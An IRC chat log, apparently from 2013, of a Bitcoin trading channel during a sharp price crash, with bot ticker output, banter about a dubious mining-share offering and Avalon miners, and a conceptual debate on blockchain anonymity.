i like how bfl's credibility goes. Mar 23 09:29:45 march delivery, 1,8k btc Mar 23 09:29:51 april delivery, 330 btc Mar 23 09:29:51 anyone watching coinlab? It's hurting Mar 23 09:29:59 july delivery, 25 btc Mar 23 09:30:08 [MPEX] [O.BTCUSD.P750T] 10 @ 0.15298694 = 1.5299 BTC [+] Mar 23 09:30:12 [BTCTC] [GSDPT] 52 @ 0.004639 = 0.2412 BTC [+] Mar 23 09:31:06 is this a bull trap Mar 23 09:32:03 btc-e hit 58 Mar 23 09:32:04 lol Mar 23 09:32:17 "Also, I am considering an increase in the price of the remaining IPO shares upon receipt of the company's batch 2 Avalon. Given the diminishing yield current shareholders have experienced while we await our first ASIC hardware I think it's fair to reward those that have held fast." Mar 23 09:32:24 zero understanding of wtf an ipo is etc. Mar 23 09:33:22 bull to the rescue i see some buying Mar 23 09:33:56 62 Mar 23 09:34:48 some decent buying? Mar 23 09:35:07 ;;ticker Mar 23 09:35:07 BTCUSD ticker | Best bid: 65.00150, Best ask: 65.02193, Bid-ask spread: 0.02043, Last trade: 65.00000, 24 hour volume: 76669.42587939, 24 hour low: 62.02310, 24 hour high: 73.69900, 24 hour vwap: 69.02867 Mar 23 09:35:10 see Mar 23 09:35:16 yep Mar 23 09:35:42 honestly, i dont see the ppoint to switching btc for fiat Mar 23 09:36:02 you'd lose out later Mar 23 09:36:33 who was saying options aren't high enough ? :D jurov ^ Mar 23 09:37:52 https://bitcointalk.org/index.php?topic=147613.msg1661314#msg1661314 mpoe-pr wins "dumbest person in this forum award" Mar 23 09:38:01 cosidering the forum is btctalk... wow. just wow. Mar 23 09:38:23 being the smartest person at nasa is probably softer competition Mar 23 09:39:50 [MPEX] [S.MPOE] 4108 @ 0.00068613 = 2.8186 BTC [+] Mar 23 09:39:57 [MPEX] [S.MPOE] 5000 @ 0.00068821 = 3.4411 BTC [+] Mar 23 09:40:03 [MPEX] [S.MPOE] 7292 @ 0.00068991 = 5.0308 BTC [+] Mar 23 09:47:50 [03:28] just bet 10 btc on bfl not shipping before apr 1st Mar 23 09:47:50 [03:28] free coins Mar 23 09:47:58 darn Mar 23 09:48:20 hmm? Mar 23 09:48:51 did bfl ship -.- Mar 23 09:48:59 well you could bet 100 BTC at current weight and get 1/20th of 60 so 3 BTC Mar 23 09:49:04 Easy peasy Mar 23 09:49:19 The weight is just very low Mar 23 09:49:23 Still, 3% Mar 23 09:50:07 Not bad for a safe bet Mar 23 09:50:23 yep, I've got better ones on betofbitcoin Mar 23 09:50:35 when the event already happened Mar 23 09:51:48 >.> Mar 23 09:51:53 no wonder it failed Mar 23 09:53:26 mp Mar 23 09:53:27 Also, I am considering an increase in the price of the remaining IPO shares upon receipt of the company's batch 2 Avalon. Given the diminishing yield current shareholders have experienced while we await our first ASIC hardware I think it's fair to reward those that have held fast. Mar 23 09:53:31 [BTCTC] [ASICMINER-PT] 1 @ 0.7821 BTC [-] Mar 23 09:53:33 [BTCTC] [ASICMINER-PT] 1 @ 0.782 BTC [-] Mar 23 09:53:34 where did this quote came from Mar 23 09:53:35 [BTCTC] [ASICMINER-PT] 2 @ 0.7811 = 1.5622 BTC [-] Mar 23 09:53:37 [BTCTC] [ASICMINER-PT] 26 @ 0.78102 = 20.3065 BTC [-] Mar 23 09:53:39 [BTCTC] [ASICMINER-PT] 4 @ 0.77002 = 3.0801 BTC [-] Mar 23 09:54:23 Bowjob, maybe AMC Mar 23 09:54:25 not sure Mar 23 09:55:53 didnt bitcoin drop when batch 2 released Mar 23 09:56:54 my old account didnt work for batch 3 shipment, i guess i have to register again Mar 23 09:59:29 guy Mar 23 09:59:30 s Mar 23 09:59:30 http://www.google.se/trends/explore#q=sell%20bitcoin,%20sell%20bitcoins Mar 23 09:59:31 Mhm Mar 23 10:03:44 buy bitcoins is pretty much the same tho Mar 23 10:04:08 yup Mar 23 10:05:03 ;;ticker Mar 23 10:05:03 BTCUSD ticker | Best bid: 64.05000, Best ask: 64.30000, Bid-ask spread: 0.25000, Last trade: 64.30000, 24 hour volume: 79479.64260130, 24 hour low: 62.02310, 24 hour high: 73.69900, 24 hour vwap: 68.77207 Mar 23 10:08:38 Bowjob yeah Mar 23 10:08:58 lmao, there's a first chop. http://polimedia.us/dtng/c/src/136402004167.jpg Mar 23 10:09:56 leo Mar 23 10:20:46 I went to SR today, just to check things out.. You could actually buy candies with it Mar 23 10:21:55 They had interestig stuff.. a cellphone jammer, a gps tracker, hacking ebooks, wireless camera detector.. shit that can get me in trouble Mar 23 10:22:30 do they have one of those now-banned airport scanners Mar 23 10:22:37 where you can take nude shots of dressed girls ? Mar 23 10:23:23 ah, didnt check. the site was too slow for me Mar 23 10:24:33 they had banned books, guides on how to make meth, guides about hiding things, Mar 23 10:24:52 even a guide about picking up chicks.. and some porn links. Mar 23 10:25:12 Bowjob: surely nothing that's not also available via the torrent sites? Mar 23 10:25:29 yeap, ive recognized one ive watched before, actually Mar 23 10:25:49 lmao pick up guide Mar 23 10:25:52 ok, that does it Mar 23 10:26:01 sr is just bullshit, honestly. Mar 23 10:27:13 mircea_popescu: do you believe that blockchain datamining will at some point begin revealing the identities of the SR early adopters? Mar 23 10:27:25 nope. Mar 23 10:28:10 To quote my baby brother, 'why not?' Mar 23 10:28:17 SR is a free market really... I guess anyone can peddle just about anything Mar 23 10:28:21 I'll go sell lints Mar 23 10:28:52 no guns though Mar 23 10:28:57 and murder contracts Mar 23 10:29:32 My pockets farm is producing lots of extra lint this year... Mar 23 10:29:32 cads well, how much do you understand about the blockchain ? Mar 23 10:31:00 ;;ticker Mar 23 10:31:01 BTCUSD ticker | Best bid: 62.03000, Best ask: 62.20000, Bid-ask spread: 0.17000, Last trade: 62.03000, 24 hour volume: 83830.41415795, 24 hour low: 62.02310, 24 hour high: 73.69900, 24 hour vwap: 68.41685 Mar 23 10:31:10 that knife.. i can feel it Mar 23 10:31:28 back to 62 huh Mar 23 10:31:36 mircea_popescu: I've read shamir's paper where shamir tracks cashflows from originator to recipient, even through large networks of obfuscation Mar 23 10:31:41 options closed just in time i swear. Mar 23 10:31:53 cads shamir is an idiot and his paper is about 80% nonsense. Mar 23 10:31:59 mircea_popescu: he handwaves his treatment of the block chain Mar 23 10:32:03 right. Mar 23 10:32:14 so I don't know how much to believe Mar 23 10:32:30 ok, let's see here. do you understand public key criptography ? Mar 23 10:32:32 I definitely do need to read the hashcash papers and the original satoshi paper Mar 23 10:33:06 mircea_popescu: yes, I understand those reasonably well Mar 23 10:33:08 ok. Mar 23 10:33:24 given an arbitrary set of public keys and an arbitrary set of encrypted messages Mar 23 10:33:56 what chances do you give yourself to identify which messages were addressed to which keys ? Mar 23 10:34:44 http://polimedia.us/dtng/f/src/130457425546.jpg Mar 23 10:34:46 wtf Mar 23 10:35:02 heh Mar 23 10:35:07 stop making me click gore omg Mar 23 10:35:15 a trolled by his own site is i. Mar 23 10:35:25 its on your site Mar 23 10:36:05 mircea_popescu: a naive search should scale exponentially :P Mar 23 10:36:24 you're presuming key information is included as plaintext. Mar 23 10:36:25 it is not. Mar 23 10:36:35 you'll have to bruteforce. Mar 23 10:36:41 [MPEX] [O.BTCUSD.P730T] 9 @ 0.15137648 = 1.3624 BTC [+] Mar 23 10:36:43 [MPEX] [O.BTCUSD.P750T] 8 @ 0.17605726 = 1.4085 BTC [+] Mar 23 10:36:49 right, bruteforce is exponentialish Mar 23 10:37:12 yeah, well, the particular hashing scheme used by the bitcoin addresses is calculated to be unbruteforceable Mar 23 10:37:16 for thermodynamic reasons Mar 23 10:37:28 so it's exponential outside of the real of the physically possible. Mar 23 10:37:36 your only practical avenue is side channels. Mar 23 10:37:44 well, we may be dropping Mar 23 10:37:45 anyways, that seems like a red herring because the has tree has more structure than the two sets of messages and keys Mar 23 10:37:53 but the fundamentals are exceedingly strong Mar 23 10:37:59 *holds Mar 23 10:37:59 cads yes it does have it, but that's optional. Mar 23 10:38:14 you can run bitcoin in such a manner as to not include more structure than unrelated pairs, ever. Mar 23 10:38:17 fundamentals lag price Mar 23 10:38:31 hence the side channel comment Mar 23 10:39:05 mircea_popescu: even the devs claim that bitcoin transactions can be tracked if they're not intractably mixed via a mixer. Mar 23 10:39:24 the devs don't have much of a clue about many things. Mar 23 10:39:34 if you make one wallet per inbound payment, there's no tracing possible. Mar 23 10:39:42 that guy offering his house for BTC marked the top Mar 23 10:39:48 as i predicted Mar 23 10:39:55 as no two addresses are ever going to be joined in inputs Mar 23 10:39:57 mircea_popescu: it sounds like your account is not much better. I will have to read the paper for myself and faithfully learn the scheme. Mar 23 10:40:22 enough second guessing for me :) Mar 23 10:40:24 well, it's not practical to run 100% security, as is always the case Mar 23 10:40:31 but that's not to say you couldn't if you wanted. Mar 23 10:40:42 which conversely means you can never be certain you'll get analytical results worth a crap. Mar 23 10:41:27 I need to see a theoretical paper on the function of anonymization mixers too Mar 23 10:41:57 unless these things give us provable cryptographic guarantees of anonymity, I don't trust it Mar 23 10:42:02 they don't. Mar 23 10:42:10 they should be called obfuscators really. Mar 23 10:42:22 eep :) Mar 23 10:42:32 so they work on what is essentially wishful thinking Mar 23 10:42:36 kinda. Mar 23 10:42:44 fantastic :) Mar 23 10:42:46 maybe there's parts of that i don't understand, but afaik... Mar 23 10:42:59 minunat :P Mar 23 10:43:19 anyway, as best i can determine the only workable mixer paradigm is what mpex employs : Mar 23 10:43:25 have all inbound payments to the same address Mar 23 10:44:05 mircea_popescu: I guess I have my new research questions Mar 23 10:44:10 :p Mar 23 10:44:18 BTC has a massive liquidity problem Mar 23 10:44:26 no other asset class loses 20-30% in the span of 2hrs Mar 23 10:44:31 if you are the reading sort, the old crypto mail list discussions with satoshi et all are quite informative on many topics Mar 23 10:44:43 tiberiusiv yes. Mar 23 10:44:47 it's not liquidity tho, it's sense. Mar 23 10:44:56 [HAVELOCK] [SDICE] 1 @ 0.529 BTC [+] Mar 23 10:44:59 no other asset class is plagued with such a concentrartion of high powered idiots. Mar 23 10:45:33 You should see OTC... real panic... Mar 23 10:45:50 [MPEX] [O.BTCUSD.P730T] 6 @ 0.1588357 = 0.953 BTC [+] Mar 23 10:45:52 [MPEX] [O.BTCUSD.P750T] 5 @ 0.18424999 = 0.9212 BTC [+] Mar 23 10:45:55 [HAVELOCK] [VTX] 1 @ 0.57099998 BTC [-] Mar 23 10:46:06 point in case Mar 23 10:46:08 http://www.bitcoincharts.com/markets/mtgoxUSD.html Mar 23 10:46:22 ITS NOT GOING TO STOP Mar 23 10:46:22 OH MY GOD Mar 23 10:46:24 bids remain strong tho yet asks... Mar 23 10:46:24 o looky 58 Mar 23 10:46:25 lol Mar 23 10:46:40 !ticker Mar 23 10:46:41 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Mar 23 10:46:51 ;;ticker Mar 23 10:46:51 BTCUSD ticker | Best bid: 58.22000, Best ask: 58.80000, Bid-ask spread: 0.58000, Last trade: 58.22000, 24 hour volume: 92634.92542725, 24 hour low: 57.80000, 24 hour high: 73.69900, 24 hour vwap: 67.57447 Mar 23 10:46:58 wtf we crashed? Mar 23 10:47:06 People are panic selling Mar 23 10:47:07 Unbelievable Mar 23 10:47:17 ha ha let them Mar 23 10:47:24 hey, its a good opportunity to buy now Mar 23 10:47:25 I wont sell until we hit $1000 Mar 23 10:47:27 for Avalon 3 if yo want Mar 23 10:47:33 doubt we see 70 again this year Mar 23 10:47:39 omg Mar 23 10:47:39 im with him Mar 23 10:47:40 Namworld: the yay part is that I panic sold back when things were at my favorite number, 69 Mar 23 10:47:45 proper trolling Mar 23 10:47:49 guy offering his house for BTC marked the top Mar 23 10:48:00 All within 2 hours Mar 23 10:48:03 ;;ticker Mar 23 10:48:05 BTCUSD ticker | Best bid: 57.78000, Best ask: 57.85000, Bid-ask spread: 0.07000, Last trade: 57.85000, 24 hour volume: 94019.67462292, 24 hour low: 57.78000, 24 hour high: 73.69900, 24 hour vwap: 67.43441 Mar 23 10:48:07 ouch Mar 23 10:48:10 this hurts Mar 23 10:48:49 down! down! Mar 23 10:48:53 yaah! Mar 23 10:48:55 BTC can go to single digits in the span of 4hrs Mar 23 10:49:03 theres no bids relative to BTC outstanding Mar 23 10:49:18 you only need 1-2% of bitcoins being sold at a given time to crash the price Mar 23 10:49:27 single digits would be cool. Mar 23 10:49:36 i'd have to re-re-refactor my option names Mar 23 10:49:44 EXACTLY the other way from what i announced i'll do Mar 23 10:49:46 not 12 hours ago Mar 23 10:50:11 >.> Mar 23 10:50:17 [04:49] if it goes near 45, it wiill stabilize there for atleast a month or so Mar 23 10:50:17 [04:49] then when the bounce comes, no stopping it till 120 Mar 23 10:50:26 and if it goes near 18 Mar 23 10:50:26 more excellent quotes from OTC Mar 23 10:50:30 it will be legal to fuck Mar 23 10:50:36 I bet guy both at 45 Mar 23 10:50:41 im strangely calm amids all this chaos Mar 23 10:50:41 yeh Mar 23 10:50:42 bought* Mar 23 10:50:49 amidst. fuck i cant spell Mar 23 10:50:50 Bowjob there's no chaos, we;'re having lulz Mar 23 10:50:54 lol Mar 23 10:51:04 panic selling is a bad bad baahd idea Mar 23 10:51:07 I have shares earning in USD... I have stocks in BTC... Mar 23 10:51:16 Really, to me, both way is fine Mar 23 10:51:24 no changes in fundamentals, we'll have bear meat soon Mar 23 10:51:26 Goes to a low price, I get cheap bitcoins Mar 23 10:51:44 and ltc goes up Mar 23 10:51:45 Goes high, I get lots of value out into bitcoin stuff Mar 23 10:52:01 seems like LTC goes up when btc goes down Mar 23 10:52:15 and the other way around too Mar 23 10:52:16 My favorite way of cashing out is through funding some businesses I like I Bitcoinland. Mar 23 10:52:22 Instead of selling BTC Mar 23 10:52:30 LTC keeps 50 cents mhm Mar 23 10:52:58 dude $1k moves LTC like 30% Mar 23 10:53:22 $56 Mar 23 10:53:39 those two numbers were switched the other way Mar 23 10:56:42 I"m so sleepy Mar 23 10:57:05 we lost about 1/3rd of BTC's purchasing strength Mar 23 10:57:07 but I want to follow the market down so I can buy back in when it's done Mar 23 10:57:09 mircea: hurts for mpex market cap Mar 23 10:57:32 maybe ianbakewell will go legit.. Mar 23 10:57:39 saying.. he got into an accident Mar 23 10:57:49 you wont be able to buy when its done because theres barely any coins offered until 65 Mar 23 10:57:49 and pays everyone at this point Mar 23 10:58:50 53 dollars Mar 23 10:58:54 ;;ticker Mar 23 10:58:54 BTCUSD ticker | Best bid: 53.01000, Best ask: 53.55000, Bid-ask spread: 0.54000, Last trade: 53.01000, 24 hour volume: 107782.51352993, 24 hour low: 53.00000, 24 hour high: 73.69900, 24 hour vwap: 65.83923 Mar 23 11:00:04 tiberiusiv yeah ;/ Mar 23 11:00:16 i got to like 49.6 mn or some shit... but not 50 ;/ Mar 23 11:00:33 Best ask: 53.5500 << Mar 23 11:00:49 at the end of the day BTC is nothing more then a confidence game Mar 23 11:00:57 it has no intrinsic value Mar 23 11:01:11 and confidence can change on a whim Mar 23 11:01:47 This drop feels good. Like being overdrunk, and finally vomiting the extra poison out. Mar 23 11:03:17 you two make a nice picture together. Mar 23 11:04:25 !ticker Mar 23 11:04:57 http://www.thebestpageintheuniverse.net/images/veil_model1.jpg Mar 23 11:04:59 ahahahaha Mar 23 11:05:52 http://www.dailymail.co.uk/news/article-2297383/Cyprus-bailout-President-Nikos-Anastasiades-warned-friends-money-abroad.html also pretty cute Mar 23 11:06:16 and... I'm down $4000 in unrealized profit Mar 23 11:06:36 might as well play dice to get those unrealized profits back Mar 23 11:06:44 lol Mar 23 11:07:30 ;;ticker Mar 23 11:07:33 BTCUSD ticker | Best bid: 55.00000, Best ask: 55.71460, Bid-ask spread: 0.71460, Last trade: 55.71460, 24 hour volume: 108334.59487058, 24 hour low: 53.00000, 24 hour high: 73.69900, 24 hour vwap: 65.77385 Mar 23 11:07:37 ;;goxlag Mar 23 11:07:38 199.314923 seconds Mar 23 11:09:54 mpex loses close to 40% of market cap in under 2 hours Mar 23 11:10:00 ouch Mar 23 11:10:59 not rly. Mar 23 11:11:06 it's a bitcoin corp, not a fiat corp. Mar 23 11:11:30 it probably gained a lot in zimbabwe dollars or w/e other fake currency out there nobody cares about. Mar 23 11:11:47 ;;goxlag Mar 23 11:11:48 140.39499 seconds Mar 23 11:12:47 ;;goxlag Mar 23 11:12:48 97.329551 seconds Mar 23 11:13:50 ;;ticker Mar 23 11:13:50 BTCUSD ticker | Best bid: 56.87473, Best ask: 59.49000, Bid-ask spread: 2.61527, Last trade: 59.49000, 24 hour volume: 108334.59487058, 24 hour low: 53.00000, 24 hour high: 73.69900, 24 hour vwap: 65.77385 Mar 23 11:14:05 all right you stupid bears. You will eat the knife. and like it too Mar 23 11:16:36 ;;ask 70 Mar 23 11:16:36 Error: "ask" is not a valid command. Mar 23 11:17:00 $mpexlag Mar 23 11:17:02 mircea_popescu: 0.0966739654541 seconds Mar 23 11:17:03 ;;goxlag Mar 23 11:17:04 15.540302 seconds Mar 23 11:17:07 heh. Mar 23 11:17:28 we're hanging to 60 Mar 23 11:17:30 ;;ticker Mar 23 11:17:31 BTCUSD ticker | Best bid: 60.70000, Best ask: 61.23400, Bid-ask spread: 0.53400, Last trade: 61.23400, 24 hour volume: 115184.27493444, 24 hour low: 52.34560, 24 hour high: 73.69900, 24 hour vwap: 64.81793 Mar 23 11:17:39 Heh, hehehehehehe Mar 23 11:18:02 too bad the nearest bid is at 53 Mar 23 11:18:26 arent you always negative Mar 23 11:20:22 it bothers me that gox fucks up their trades Mar 23 11:20:28 will coinlab be like this too? Mar 23 11:20:36 plagued by lag, ect Mar 23 11:20:40 ;;ticker Mar 23 11:20:40 BTCUSD ticker | Best bid: 62.00000, Best ask: 62.80000, Bid-ask spread: 0.80000, Last trade: 62.80000, 24 hour volume: 116073.49685910, 24 hour low: 52.34560, 24 hour high: 73.69900, 24 hour vwap: 64.74844 Mar 23 11:20:42 this is coinbaselab Mar 23 11:21:26 so same engine? Mar 23 11:29:02 http://www.coinlab.com/ Mar 23 11:29:23 notice the warning in red over the ticker Mar 23 11:31:37 does it say "We suck" ? Mar 23 11:31:58 o hey, their site doesn't load in my browser. so much win. Mar 23 11:32:15 I think it's synonymous Mar 23 11:32:43 the warning says: "Mt. Gox sockets are down. Trade data will not update until they come back online, and depth data will only update once every 15 minutes. Sorry! " Mar 23 11:32:52 o ic Mar 23 11:33:17 this is reminiscent of tradehill's "the old tradehill site is to blame" response to defrauded customers complaining on tyheir failed relaunch attempt Mar 23 11:34:33 so avg price dropped ~ 5 bux off 70 peak in 2 hours Mar 23 11:34:59 ;;ticker Mar 23 11:35:00 BTCUSD ticker | Best bid: 62.90000, Best ask: 63.16668, Bid-ask spread: 0.26668, Last trade: 62.90000, 24 hour volume: 116073.49685910, 24 hour low: 52.34560, 24 hour high: 73.69900, 24 hour vwap: 64.74844 Mar 23 11:35:05 yeah i guess Mar 23 11:35:15 ;;goxlag Mar 23 11:35:15 212.825885 seconds Mar 23 11:35:23 well. Mar 23 11:35:26 shit Mar 23 11:35:26 lol Mar 23 11:35:26 :fuuuuuu: Mar 23 11:35:43 it went 53, someone reported getting an order filled for 51 Mar 23 11:35:47 that must hurt for the bear Mar 23 11:36:21 next time anyone wants to trust the conference trail scum with a toy worth half a billion dollars, Mar 23 11:36:27 remember coinlab and vessenes. Mar 23 11:39:35 ;;goxlag Mar 23 11:39:36 0.173256 seconds Mar 23 11:39:39 ;;ticker Mar 23 11:39:40 BTCUSD ticker | Best bid: 62.48999, Best ask: 62.49000, Bid-ask spread: 0.00001, Last trade: 62.49000, 24 hour volume: 116073.49685910, 24 hour low: 52.34560, 24 hour high: 73.69900, 24 hour vwap: 64.74844 Mar 23 11:39:51 im okay with this Mar 23 11:40:13 http://www.bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 23 11:40:23 look at that spread Mar 23 11:40:24 weekend barely just begun Mar 23 11:40:28 wait till the news spreads Mar 23 11:40:36 there's going to be a 2nd prong i think Mar 23 11:40:59 ;;asks 55 Mar 23 11:41:02 There are currently 0 bitcoins offered at or under 55.0 USD, worth 0.0 USD in total. | Data vintage: 0.0023 seconds Mar 23 11:41:07 ;;bids 52 Mar 23 11:41:08 There are currently 17190.312 bitcoins demanded at or over 52.0 USD, worth 937427.107527 USD in total. | Data vintage: 5.3785 seconds Mar 23 11:41:26 it will get pretty volatile Mar 23 11:41:27 ;;bids 55 Mar 23 11:41:28 There are currently 8854.509 bitcoins demanded at or over 55.0 USD, worth 494777.013854 USD in total. | Data vintage: 25.2820 seconds Mar 23 11:41:33 ;;bids 58 Mar 23 11:41:34 There are currently 831.89671 bitcoins demanded at or over 58.0 USD, worth 48595.2207021 USD in total. | Data vintage: 31.6176 seconds Mar 23 11:41:52 superold data Mar 23 11:42:34 30 seconds is too late in bitcoinland Mar 23 11:43:12 https://www.canadianbitcoins.com/ Mar 23 11:43:15 still 77 Mar 23 11:43:16 damn Mar 23 11:43:38 lol Mar 23 11:43:38 canadianbitcoins used to be pretty cheap, sometimes even lower than gox prices Mar 23 11:43:51 back in dec Mar 23 11:44:15 you could buy from canadianbtc and make profit arbitraging it to fastcash4bitcoins Mar 23 11:44:41 cadbtc selling for 13.5, fastcas paying 14 Mar 23 11:44:42 lol Mar 23 11:46:00 ;;ticker Mar 23 11:46:01 BTCUSD ticker | Best bid: 61.95000, Best ask: 62.48999, Bid-ask spread: 0.53999, Last trade: 61.95000, 24 hour volume: 126755.91316438, 24 hour low: 52.34560, 24 hour high: 73.69900, 24 hour vwap: 64.42759 Mar 23 12:05:27 Actually, fees on cavirtex are 3% to .5% depending on volume... Mar 23 12:05:48 Assuming an average of 2% and daily trading of 1500 BTC Mar 23 12:06:02 that's 30 BTC per day Mar 23 12:06:12 10K shares ? Mar 23 12:06:41 Divided by 100 000 shares (10k IPOed for 10%), that's 0.0003 BTC per day Mar 23 12:07:23 for 0.4btc/share (IPO price) Mar 23 12:07:33 So 0.1095 BTC per year or 25% per year Mar 23 12:07:49 in BTC land, nothing Mar 23 12:08:13 eh Mar 23 12:08:22 They're stable tho Mar 23 12:08:38 Been around since 2011 and actually legitly registered. Mar 23 12:08:59 not registered yet afaik Mar 23 12:09:58 they trade btc higher than gox Mar 23 12:10:02 why they need money ? what they wanna do with IPO money ? Mar 23 12:10:05 but the 3% is killing me Mar 23 12:10:16 ? Mar 23 12:10:33 3% fee on both sides Mar 23 12:11:12 no, about being registered Mar 23 12:11:40 they are registered legitly Mar 23 12:13:15 I thought so too... Mar 23 12:13:17 "lol, party is over. Years long downtrend in place now. " -proudhon Mar 23 12:14:26 "24 hour low: 52.34560, 24 hour high: 73.69900" a trader fantasy Mar 23 12:18:17 i didnt move my position. i just watched the action Mar 23 12:18:26 *yawn, im getting desensitized to this Mar 23 12:26:37 Oh shit!! Mar 23 12:26:47 AMC is valuating themselves at 1 million BTC?!? Mar 23 12:27:31 what amc? Mar 23 12:28:12 LOL Mar 23 12:28:17 someone trying to cash into the asicminer hype Mar 23 12:28:28 for those who wish they bought avalons / asicminer Mar 23 12:28:41 on Bitfunder Mar 23 12:28:46 how was that even allowed? Mar 23 12:28:56 asicminer at 1m.. Mar 23 12:28:57 wtf Mar 23 12:29:31 Bowjob not asicminer Mar 23 12:29:34 anonymous dude with zero info whatsoever except bold claims in the text on bitfunder... no website, no info, no nothing Mar 23 12:29:36 some wannabe fund that owns what, 2% Mar 23 12:30:01 AMC Offering: Mar 23 12:30:01 AMC's offering is comprised of 100,000,000 shares in total. Mar 23 12:30:01 1 share of AMC on BitFunder represents 1/100,000,000th of 100% of the monthly profits after all expenses. Mar 23 12:30:03 Namworld anyway, gotta compete right ? Mar 23 12:30:09 mornin Mar 23 12:30:15 heya. Mar 23 12:30:18 o, what a drop, 70 to 50 Mar 23 12:30:18 Active Mining Cooperative Mar 23 12:30:22 If they sell for like 1000 BTC (100 000 shares) Mar 23 12:30:25 mircea_popescu, wasn't actually listed on the homepage for a while Mar 23 12:30:49 They get to keep 99.9% of everything Mar 23 12:30:55 AFTER expenses Mar 23 12:31:01 What the fuck? Mar 23 12:31:03 it's not like bears went unscathed. bears got gored at 52. Mar 23 12:31:34 Net Estimated ROI/Year @ .01 BTC/share 2,847.47208%/Year* Mar 23 12:31:59 Kenneth E. Slaughter Mar 23 12:32:01 lol cute. Mar 23 12:32:06 is that a fake name? Mar 23 12:32:15 a well, as long as people are willing to put btc in that people deserve to. Mar 23 12:33:00 holy fuck bitfunder if im trying to copy and paste dont close it up Mar 23 12:33:12 Don't people research/read contract/look at past history before putting some coins in? Mar 23 12:33:49 Namworld, it sold like 11 btc worth Mar 23 12:34:46 avalon batch 4 Mar 23 12:34:51 scam Mar 23 12:36:05 Est Gross(less power) Revenue 12 Months 2,847,472.08 BTC Mar 23 12:36:24 THERE'S NOT EVEN THAT MUCH MINING GOING TO HAPPEN! >.< Mar 23 12:36:39 LOL Mar 23 12:36:40 haha Mar 23 12:36:43 oh my god Mar 23 12:37:16 I hope that 10 BTC was traded by the issuer to stimulate trading... Mar 23 12:37:27 How did Ukto let that go through? Mar 23 12:38:04 http://store.avalon-asics.com/?product=avalon-asic-batch-2 Mar 23 12:38:11 1500 BTC Mar 23 12:38:12 lol Mar 23 12:38:53 da wat? Mar 23 12:39:01 probably was meant to be 1500 USD but they screwed that Mar 23 12:39:31 http://store.avalon-asics.com/?product=avalon-asic-unit Mar 23 12:39:34 this is last one Mar 23 12:39:40 no thanks. Mar 23 12:39:55 Namworld, no Mar 23 12:39:57 they want "reasonable ROI" Mar 23 12:40:01 !r unbalanced Mar 23 12:40:14 how come its 63 gigahash Mar 23 12:40:15 says 88 btc for me Mar 23 12:40:25 thats slower than.. batch 1 and 2 Mar 23 12:40:38 63GH/s guaranteed Mar 23 12:40:50 bowjob re: "cadbtc selling for 13.5, fastcas paying 14" -- thanks I had to change my pants before realizing you were talking about the good old days Mar 23 12:41:07 Oh, lol. xD Mar 23 12:41:16 Bitcoin... You Must Never Look Away Mar 23 12:41:22 I actually pointed it out to topace, seems like he didn't care at the time Mar 23 12:41:27 but cadbtc is so OP now Mar 23 12:41:50 i never did arb from cadbtc to fastcash, seemed like a dick move Mar 23 12:42:26 crazy ride Mar 23 12:42:37 im used to it Mar 23 12:42:44 yeah me too Mar 23 12:42:49 umm yeah so avalon Mar 23 12:42:57 what happened? Mar 23 12:42:58 it was 65 gigahash guaranteed Mar 23 12:43:05 but now 63 gigahash guaranteed Mar 23 12:43:06 66 I thought Mar 23 12:43:09 that doesnt make sense Mar 23 12:43:17 why would they lower the guarantee rate Mar 23 12:43:27 chips? Mar 23 12:43:38 dunno Mar 23 12:43:54 I mean, for each batch Mar 23 12:43:57 at this point you'd still make your investment back, though longer Mar 23 12:44:03 cadbtc pegs to virtex recent history, not Mt. Gox, AFAIK Mar 23 12:44:12 you lose some chips that don't work Mar 23 12:44:13 Bowjob, they probably wasted a couple of chips Mar 23 12:44:20 (well they'd be mining it themselves) Mar 23 12:44:36 you know how it goes with chiniese, each batch more btc, each batch less hash Mar 23 12:44:57 maybe the number that did between 63 and 65 was very significant Mar 23 12:45:00 we actually didnt know that they were the first asic one Mar 23 12:45:16 well, at this point provided bfl doesnt ship Mar 23 12:45:24 batch 3 is gonna be a good deal Mar 23 12:45:29 Virtex used to trade higher than Mt. Gox during uptrends, now seems to all the time. Supply/demand I figure. Mar 23 12:45:30 I think so Mar 23 12:45:43 even if bfl ships, i doubt they'd be able to ship all pre orders Mar 23 12:45:46 bitfloor ask is $69 Mar 23 12:46:02 ;;ticker Mar 23 12:46:03 BTCUSD ticker | Best bid: 64.46000, Best ask: 64.48000, Bid-ask spread: 0.02000, Last trade: 64.48000, 24 hour volume: 133914.42658800, 24 hour low: 52.34560, 24 hour high: 73.69900, 24 hour vwap: 64.05389 Mar 23 12:46:17 I exercised my 41 calls at 71 Mar 23 12:46:27 At this rate I'll catch up to you guys and start asking q's about avalon in another hour or so. Mar 23 12:46:28 you dun well Mar 23 12:46:42 anyways, anyone know how to run an avalon? Mar 23 12:46:46 http://trilema.com/2013/lets-capture-forum-bugs-in-amber/ Mar 23 12:46:48 lol, my friend was shorting Mar 23 12:46:51 having a leetal fun Mar 23 12:46:51 MJR__ nice! Mar 23 12:46:59 i haven't done any mining, at all. this is my first time mining Mar 23 12:47:04 so when he was happy about the 5 drop Mar 23 12:47:25 Bowjob: you would install the firmware I guess Mar 23 12:47:39 and hook it up to a computer... Mar 23 12:47:52 I have not seen a video of avalon from start to finish Mar 23 12:47:57 or I think you could even just program it directly Mar 23 12:48:03 right. Mar 23 12:48:10 since it runs a Linux os Mar 23 12:48:13 suppose i get the box, i open it. gloves and shit Mar 23 12:48:35 attach a monitor and a keyboard Mar 23 12:48:44 im guessing Mar 23 12:48:54 https://en.bitcoin.it/wiki/Avalon Mar 23 12:49:27 I'm stuck on step 2. Mar 23 12:49:29 "Setup your laptop IP address 192.168.0.101 " Mar 23 12:50:10 huh? are both devices on the same network? Mar 23 12:50:57 no clue, really Mar 23 12:51:04 nvm Mar 23 12:51:17 you directly attach your laptop to the Avalon Mar 23 12:51:35 and then you use a static IP on that port Mar 23 12:51:55 then you use a web browser to get to the config page Mar 23 12:52:08 similar to setting up a wifi router Mar 23 12:52:26 If I can't figure this shit out by the time I get my avalon, 2 BTC pot to help me get it running Mar 23 12:52:39 I was able to set up GGPO, so avalon shouldn't be too hard Mar 23 12:52:42 Bowjob, batch? Mar 23 12:52:45 2 Mar 23 12:52:52 cool Mar 23 12:53:07 i have a decend idea on how to do it, the webgui reminds me of my router Mar 23 12:53:08 my friend and I are working on an fpga design Mar 23 12:53:11 *decent Mar 23 12:53:20 anyone else got avalon 2? Mar 23 12:53:27 I wish :( Mar 23 12:53:43 I camped out on both days avalon 2s were for sale Mar 23 12:53:56 my friend has some very interesting ideas about latency vs throughput Mar 23 12:53:58 